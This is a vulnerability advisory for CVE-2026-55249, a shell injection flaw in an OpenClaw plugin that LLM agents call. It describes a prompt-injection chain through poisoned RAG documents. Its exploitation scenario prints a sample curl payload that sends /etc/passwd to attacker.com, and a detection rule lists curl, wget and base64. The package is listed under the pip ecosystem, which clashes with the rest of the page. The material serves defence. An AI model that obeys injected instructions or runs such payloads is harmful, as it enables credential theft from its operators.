CVE-2026-55249: @rtk-ai/rtk-rewrite: RCE via shell injection in exec tool

MEDIUM
Published June 23, 2026
CISO Take

The @rtk-ai/rtk-rewrite plugin for OpenClaw (v1.0.0) passes attacker-controlled input directly into a Node.js execSync() template string without escaping shell metacharacters: JSON.stringify() wraps the value in double quotes but leaves $() and backtick command substitutions intact, so /bin/sh expands attacker-injected subcommands before rtk is ever invoked. The real danger here is the attack vector — any LLM agent or tool-call gateway that feeds external input (user prompts, retrieved documents, tool responses) into the exec tool creates a direct chain from prompt injection to OS-level code execution with the process's full privileges. The CVE is not in CISA KEV and no public exploit exists yet, but attack complexity is low once an adversary understands the agent's tool-invocation behavior, and the confidentiality impact is rated HIGH. Immediate action: upgrade @rtk-ai/rtk-rewrite past 1.0.0 when a patch is available; in the interim, disable the exec tool if not operationally required, enforce subprocess allowlisting, and run the OpenClaw process under a least-privilege account with OS-level sandboxing (seccomp, container isolation).

Sources: NVD, GitHub Advisory, ATLAS

What is the risk?

CVSS 6.3 understates practical risk in agentic AI deployments. The vulnerability class is OS command injection (CWE-78) — well-understood and trivial to exploit once the injection point is reachable. The decisive factor is the attack surface: in LLM agent pipelines, attacker-controlled content (from user prompts, RAG-retrieved documents, or upstream tool responses) routinely flows into tool parameters without sanitization. Low attack complexity and network reachability mean any internet-exposed OpenClaw deployment with this plugin is a credible target. Privilege requirements (Low) and user interaction (Required) reflect the dependency on an agent operator session, but in automated agentic workflows that 'required interaction' may be fulfilled automatically. Overall practical risk: HIGH for organizations running autonomous or semi-autonomous OpenClaw agents processing untrusted input.

How does the attack unfold?

1. Payload Injection (AML.T0051)
   Adversary embeds $() shell metacharacters in content that will reach the exec tool's command parameter, via a crafted user prompt, a poisoned RAG document, or a malicious upstream tool-call response.

2. Agent Tool Invocation (AML.T0053)
   The LLM agent processes the attacker-influenced content and invokes the OpenClaw exec tool, passing the malicious string as the command argument to @rtk-ai/rtk-rewrite.

3. Shell Injection Execution (AML.T0050)
   execSync() interpolates the JSON.stringify()-wrapped input into a /bin/sh -c template; the shell expands the unescaped $() subcommand before rtk is invoked, executing the attacker's payload.

4. Host Compromise (AML.T0072)
   Attacker achieves arbitrary OS command execution at plugin/gateway process privilege level, enabling credential theft, data exfiltration, reverse shell establishment, or persistent backdoor installation.

What systems are affected?

Package: OpenClaw
Ecosystem: pip
Vulnerable range: not listed
Patched: No patch
Dependents: 4 (37% patched, ~3d to patch)


How severe is it?

CVSS 3.1
6.3 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

What is the attack surface?

Metric                      Value
AV (Attack Vector)          Network
AC (Attack Complexity)      Low
PR (Privileges Required)    Low
UI (User Interaction)       Required
S (Scope)                   Unchanged
C (Confidentiality)         High
I (Integrity)               Low
A (Availability)            None

What should I do?

6 steps
  1. PATCH

    Upgrade @rtk-ai/rtk-rewrite to a version that applies shell-safe escaping (e.g., using a library like shell-quote or shlex before interpolation into execSync).

  2. DISABLE

    If the exec tool is not operationally required, disable it in OpenClaw configuration immediately.

  3. ALLOWLIST

    Restrict permissible command values to a strict allowlist; reject any input containing $(), backticks, semicolons, pipes, or redirect operators.

  4. SANDBOX

    Run the OpenClaw/rtk-rewrite process under a least-privilege OS account with seccomp filtering or inside a container that blocks unexpected subprocess spawning.

  5. DETECT

    Alert on unusual child process creation from the OpenClaw process (e.g., unexpected shells, curl/wget, base64 invocations).

  6. AUDIT

    Review all inputs flowing into the exec tool from LLM outputs or external retrieval sources for command injection payloads.
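One way to implement the DETECT step, as an added example that is not part of this advisory or of any OpenClaw tooling: a rule run over constructed process-creation events (field names and the sample data are hypothetical) that flags network/encoding tools under the gateway process and shell command lines carrying a command substitution.

```javascript
// Added detection example, not part of the advisory or any product. Events
// are constructed in the shape a process-creation audit feed might emit; the
// field names (pid, image, cmdline, ancestry) are hypothetical.
const TOOL_CHILDREN = new Set(['curl', 'wget', 'base64']); // from the DETECT step
const SHELLS = new Set(['sh', 'bash', 'dash']);

const sampleEvents = [ // constructed sample data
  { ts: '2026-06-23T10:00:01Z', pid: 4201, image: 'sh',
    cmdline: '/bin/sh -c rtk "git status"',
    ancestry: ['node openclaw-gateway.js'] },
  { ts: '2026-06-23T10:00:02Z', pid: 4202, image: 'sh',
    cmdline: '/bin/sh -c rtk "ls $(id)"',
    ancestry: ['node openclaw-gateway.js'] },
  { ts: '2026-06-23T10:00:02Z', pid: 4203, image: 'curl',
    cmdline: 'curl https://example.invalid/x',
    ancestry: ['node openclaw-gateway.js', '/bin/sh -c rtk "ls $(id)"'] },
  { ts: '2026-06-23T10:05:00Z', pid: 4204, image: 'curl',
    cmdline: 'curl https://example.invalid/health',
    ancestry: ['cron', 'bash healthcheck.sh'] },
];

function hasOpenClawAncestor(ev) {
  return ev.ancestry.some((c) => /openclaw/i.test(c));
}

// One alert per matching event. execSync() always goes through /bin/sh -c, so
// a shell child by itself is expected on an unpatched install; the signal is a
// $(...) or backtick substitution inside the shell's command line, or a
// network/encoding tool appearing anywhere beneath the gateway process.
function detectSuspiciousChildren(events) {
  const alerts = [];
  for (const ev of events) {
    if (!hasOpenClawAncestor(ev)) continue;
    if (TOOL_CHILDREN.has(ev.image)) {
      alerts.push({ pid: ev.pid, ts: ev.ts,
        reason: `tool ${ev.image} spawned under OpenClaw` });
    } else if (SHELLS.has(ev.image) && /\$\(|`/.test(ev.cmdline)) {
      alerts.push({ pid: ev.pid, ts: ev.ts,
        reason: 'command substitution in shell -c command line' });
    }
  }
  return alerts;
}
```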

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.8.5 - AI System Security
NIST AI RMF
MANAGE-2.2 - Mechanisms to respond to AI risks are activated for known risks
OWASP LLM Top 10
LLM05 - Improper Output Handling
LLM06 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-55249?

The @rtk-ai/rtk-rewrite plugin for OpenClaw (v1.0.0) passes attacker-controlled input directly into a Node.js execSync() template string without escaping shell metacharacters: JSON.stringify() wraps the value in double quotes but leaves $() and backtick command substitutions intact, so /bin/sh expands attacker-injected subcommands before rtk is ever invoked. The real danger here is the attack vector — any LLM agent or tool-call gateway that feeds external input (user prompts, retrieved documents, tool responses) into the exec tool creates a direct chain from prompt injection to OS-level code execution with the process's full privileges. The CVE is not in CISA KEV and no public exploit exists yet, but attack complexity is low once an adversary understands the agent's tool-invocation behavior, and the confidentiality impact is rated HIGH. Immediate action: upgrade @rtk-ai/rtk-rewrite past 1.0.0 when a patch is available; in the interim, disable the exec tool if not operationally required, enforce subprocess allowlisting, and run the OpenClaw process under a least-privilege account with OS-level sandboxing (seccomp, container isolation).

Is CVE-2026-55249 actively exploited?

No confirmed active exploitation of CVE-2026-55249 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-55249?

1. PATCH: Upgrade @rtk-ai/rtk-rewrite to a version that applies shell-safe escaping (e.g., using a library like shell-quote or shlex before interpolation into execSync).
2. DISABLE: If the exec tool is not operationally required, disable it in OpenClaw configuration immediately.
3. ALLOWLIST: Restrict permissible command values to a strict allowlist; reject any input containing $(), backticks, semicolons, pipes, or redirect operators.
4. SANDBOX: Run the OpenClaw/rtk-rewrite process under a least-privilege OS account with seccomp filtering or inside a container that blocks unexpected subprocess spawning.
5. DETECT: Alert on unusual child process creation from the OpenClaw process (e.g., unexpected shells, curl/wget, base64 invocations).
6. AUDIT: Review all inputs flowing into the exec tool from LLM outputs or external retrieval sources for command injection payloads.

What systems are affected by CVE-2026-55249?

This vulnerability affects the following AI/ML architecture patterns: LLM agent frameworks, AI agent tool integrations, LLM gateway deployments, RAG-augmented agent pipelines, Multi-agent orchestration systems.

What is the CVSS score for CVE-2026-55249?

CVE-2026-55249 has a CVSS v3.1 base score of 6.3 (MEDIUM).

What is the AI security impact?

Affected AI Architectures

LLM agent frameworks
AI agent tool integrations
LLM gateway deployments
RAG-augmented agent pipelines
Multi-agent orchestration systems

MITRE ATLAS Techniques

AML.T0010.005 AI Agent Tool
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0051 LLM Prompt Injection
AML.T0053 AI Agent Tool Invocation

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.8.5
NIST AI RMF: MANAGE-2.2
OWASP LLM Top 10: LLM05, LLM06

What are the technical details?

Original Advisory

@rtk-ai/rtk-rewrite transparently rewrites shell commands executed via OpenClaw's exec tool to their RTK equivalents. In 1.0.0, the @rtk-ai/rtk-rewrite OpenClaw plugin passes attacker-controlled input directly into a shell-backed execSync() template string without shell-safe escaping. JSON.stringify() wraps the value in double quotes and escapes inner double-quotes and backslashes, but leaves $() and backtick shell metacharacters untouched. Because execSync delegates execution to /bin/sh -c, the shell expands $(...) substitutions even inside double-quoted strings, causing the injected subcommand to execute before rtk is invoked. An attacker who can influence the exec tool's command parameter (e.g., via an LLM agent prompt or gateway/tool-call input) achieves arbitrary OS command execution with the privileges of the plugin/gateway process.

Exploitation Scenario

An adversary targeting an organization running an OpenClaw-based AI assistant embeds a payload such as $(curl attacker.com/exfil?data=$(cat /etc/passwd | base64)) inside a document that will be retrieved by the agent's RAG pipeline. When a user queries the agent, the LLM processes the retrieved content and — following its instructions or the injected payload's social-engineering framing — invokes the exec tool with the malicious string as the command parameter. The @rtk-ai/rtk-rewrite plugin wraps the value in double quotes via JSON.stringify() and interpolates it into the execSync() call; /bin/sh expands the $() substitution before rtk runs, causing the data exfiltration command to execute silently under the gateway process account. The agent returns a normal-looking response while the attacker receives the exfiltrated credential data out-of-band.

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N

Timeline

Published
June 23, 2026
Last Modified
June 23, 2026
First Seen
June 23, 2026
